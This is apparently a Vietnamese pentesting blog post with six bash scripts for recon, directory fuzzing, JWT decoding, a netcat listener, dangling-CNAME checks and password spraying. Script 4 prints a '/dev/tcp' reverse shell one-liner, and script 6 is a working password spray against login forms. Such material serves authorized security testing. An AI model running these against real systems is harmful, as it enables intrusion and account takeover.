Bash không phải là ngôn ngữ đẹp nhất, nhưng khi bạn cần automation nhanh trong pentest, không có gì hiệu quả hơn. Đây là 15 script thực tế mà tôi dùng thường xuyên.
1. Quick Recon Script
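#!/bin/bash
# Quick recon: passive subdomain enumeration, live-host probing and a
# top-1000 port scan; every artifact lands in one dated output directory.
#
# Usage: recon.sh <domain>
# Requires subfinder, amass, httpx and nmap on PATH.
set -u

die() { printf '%s\n' "$*" >&2; exit 1; }

TARGET=${1:?usage: ${0##*/} <domain>}
# The target becomes part of a filesystem path and of several command lines,
# so accept hostname characters only (this also rejects "../" and whitespace).
[[ "$TARGET" =~ ^[A-Za-z0-9.-]+$ ]] || die "invalid target: $TARGET"
for tool in subfinder amass httpx nmap; do
  command -v "$tool" >/dev/null || die "required tool not found: $tool"
done

OUTPUT="recon_${TARGET}_$(date +%Y%m%d)"
mkdir -p -- "$OUTPUT" || die "cannot create $OUTPUT"
echo "[*] Running recon on $TARGET"

# Subdomain enumeration
echo "[+] Subdomains..."
subfinder -d "$TARGET" -silent > "$OUTPUT/subdomains.txt"
# Create the amass file up front so the merge below still works when amass
# writes nothing; its errors are tolerated on purpose (fewer names, not a
# failed run).
: > "$OUTPUT/amass.txt"
amass enum -passive -d "$TARGET" -o "$OUTPUT/amass.txt" 2>/dev/null || true
sort -u -- "$OUTPUT/subdomains.txt" "$OUTPUT/amass.txt" > "$OUTPUT/all_subs.txt"
echo " Found: $(wc -l < "$OUTPUT/all_subs.txt") subdomains"

# Check live hosts
echo "[+] Live hosts..."
httpx -silent -status-code < "$OUTPUT/all_subs.txt" > "$OUTPUT/live.txt"
echo " Live: $(wc -l < "$OUTPUT/live.txt") hosts"

# Port scan on live hosts
echo "[+] Port scanning..."
# httpx prints "<url> [<status>]" per line.  Reduce each URL to a bare host
# name (drop scheme, port and path) and dedupe, since nmap -iL expects
# targets, not URLs.
awk '{print $1}' "$OUTPUT/live.txt" \
  | sed -e 's|^https\?://||' -e 's|[:/].*$||' \
  | sort -u \
  | nmap -iL - -T4 --top-ports 1000 -oN "$OUTPUT/ports.txt" 2>/dev/null
echo "[*] Done! Results in ./$OUTPUT/"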
2. Directory Brute Force Wrapper
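#!/bin/bash
# Directory brute-force wrapper around ffuf.
#
# Usage: dirfuzz.sh <base-url> [wordlist]
#   base-url  "/FUZZ" is appended to it, so pass it without a trailing slash
#   wordlist  defaults to dirb's common.txt
# Output: a JSON report named ffuf_<epoch>.json in the current directory.
set -u

die() { printf '%s\n' "$*" >&2; exit 1; }

URL=${1:?usage: ${0##*/} <url> [wordlist]}
WORDLIST="${2:-/usr/share/wordlists/dirb/common.txt}"
# ffuf would otherwise start and then fail on an unreadable list.
[[ -r "$WORDLIST" ]] || die "wordlist not readable: $WORDLIST"
command -v ffuf >/dev/null || die "ffuf not found on PATH"

echo "[*] Fuzzing: $URL"
# -mc keeps only these status codes, -ac auto-calibrates the filters against
# generic responses, -t sets the number of concurrent workers.
ffuf -u "$URL/FUZZ" \
  -w "$WORDLIST" \
  -mc 200,301,302,403 \
  -ac \
  -t 50 \
  -o "ffuf_$(date +%s).json" \
  -of json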
3. JWT Decoder One-liner
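#!/bin/bash
# Decode a JWT's header and payload for inspection.  The signature is NOT
# verified, so nothing printed here may be treated as an authenticated claim.
#
# Usage: jwtdecode.sh <token>
set -u

JWT=${1:?usage: ${0##*/} <jwt>}

#######################################
# Print one base64url segment as pretty JSON.
# Arguments: $1 - base64url-encoded JWT segment
# Outputs:   indented JSON on stdout
# Returns:   non-zero if the segment is not valid base64 or not JSON
#######################################
decode_part() {
  local segment=$1 json
  # base64url -> standard base64: swap the URL-safe alphabet back, then
  # restore the '=' padding that JWTs strip (length must be a multiple of 4).
  segment=${segment//-/+}
  segment=${segment//_//}
  while (( ${#segment} % 4 )); do
    segment+='='
  done
  # printf rather than echo: a segment may legitimately start with '-'.
  if ! json=$(printf '%s' "$segment" | base64 -d 2>/dev/null); then
    printf 'error: segment is not valid base64\n' >&2
    return 1
  fi
  printf '%s\n' "$json" | python3 -m json.tool
}

# Split on '.'; the third part (signature) is not used here.
IFS='.' read -r header payload _ <<< "$JWT"
echo "=== HEADER ==="
decode_part "$header"
echo "=== PAYLOAD ==="
decode_part "$payload"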
4. Simple Reverse Shell Catcher
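#!/bin/bash
# Start a plain netcat listener on the given port and print the matching
# client-side command for reference.
#
# Usage: listen.sh [port]   (default: 4444)
set -u

PORT=${1:-4444}
# nc receives the port unvalidated on its command line; reject anything that
# is not an integer in 1-65535 first (10# avoids octal parsing of "08").
if ! [[ "$PORT" =~ ^[0-9]+$ ]] || (( 10#$PORT < 1 || 10#$PORT > 65535 )); then
  printf 'invalid port: %s\n' "$PORT" >&2
  exit 1
fi
command -v nc >/dev/null || { printf 'nc not found on PATH\n' >&2; exit 1; }

echo "[*] Listening on port $PORT..."
echo "[*] Setup reverse shell:"
# The address comes from ifconfig.me, so this line needs outbound network
# access and prints whatever public address that service reports.
echo " bash -i >& /dev/tcp/$(curl -s ifconfig.me)/$PORT 0>&1"
echo ""
nc -lvnp "$PORT"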
5. Mass Subdomain Takeover Check
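#!/bin/bash
# Flag subdomains whose CNAME target does not resolve: a dangling CNAME is the
# precondition for a subdomain takeover and should be removed or re-pointed.
#
# Usage: cname-check.sh <file with one subdomain per line>
# Output: one "[!] POTENTIAL TAKEOVER" line per candidate on stdout; lookup
#         failures go to stderr so they are not mistaken for findings.
set -u

INPUT=${1:?usage: ${0##*/} <subdomain-list>}
[[ -r "$INPUT" ]] || { printf 'cannot read %s\n' "$INPUT" >&2; exit 1; }
command -v dig >/dev/null || { printf 'dig not found on PATH\n' >&2; exit 1; }

# "|| [[ -n ... ]]" still processes a last line without a trailing newline.
while IFS= read -r subdomain || [[ -n "$subdomain" ]]; do
  # The list usually comes from other tools, so treat it as untrusted: skip
  # blanks and anything that is not a plausible hostname.
  [[ -n "$subdomain" && "$subdomain" =~ ^[A-Za-z0-9._-]+$ ]] || continue

  # A non-zero status means dig itself failed (no resolver, timeout); that
  # must not be reported as "no IP".
  if ! cname=$(dig +short CNAME "$subdomain" 2>/dev/null); then
    printf '[?] lookup failed for %s\n' "$subdomain" >&2
    continue
  fi
  [[ -n "$cname" ]] || continue
  # Keep only the first line in case more than one record comes back.
  cname=${cname%%$'\n'*}

  # Check if the alias target resolves to anything
  if ! ip=$(dig +short "$cname" 2>/dev/null); then
    printf '[?] lookup failed for %s\n' "$cname" >&2
    continue
  fi
  # NOTE(review): an empty answer is flagged whether the target is NXDOMAIN or
  # merely has no A/AAAA record; confirm the DNS status before acting on it.
  if [[ -z "$ip" ]]; then
    echo "[!] POTENTIAL TAKEOVER: $subdomain → $cname (no IP)"
  fi
done < "$INPUT"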
6. Password Spray Script
#!/bin/bash
# Password spray: try ONE password against every user in a list, one request
# per second.
# ONLY use on systems you are authorized to test.
#
# Usage: spray.sh <login-url> <userlist> <password>
#   The form is assumed to take form-encoded "username" and "password" fields.
TARGET_URL=$1
USERLIST=$2
PASSWORD=$3
while read -r user; do
# One attempt; only the final HTTP status (after redirects, -L) is captured.
response=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$TARGET_URL" \
-d "username=$user&password=$PASSWORD" \
-L)
# Heuristic: a failed login is expected to answer 200 (form re-rendered) or
# 401; every other status is printed as a hit.  NOTE(review): this is
# site-specific — a 403 from rate limiting or a 5xx is reported the same way.
if [ "$response" != "200" ] && [ "$response" != "401" ]; then
echo "[+] HIT: $user:$PASSWORD (HTTP $response)"
fi
sleep 1 # Rate limiting
done < "$USERLIST"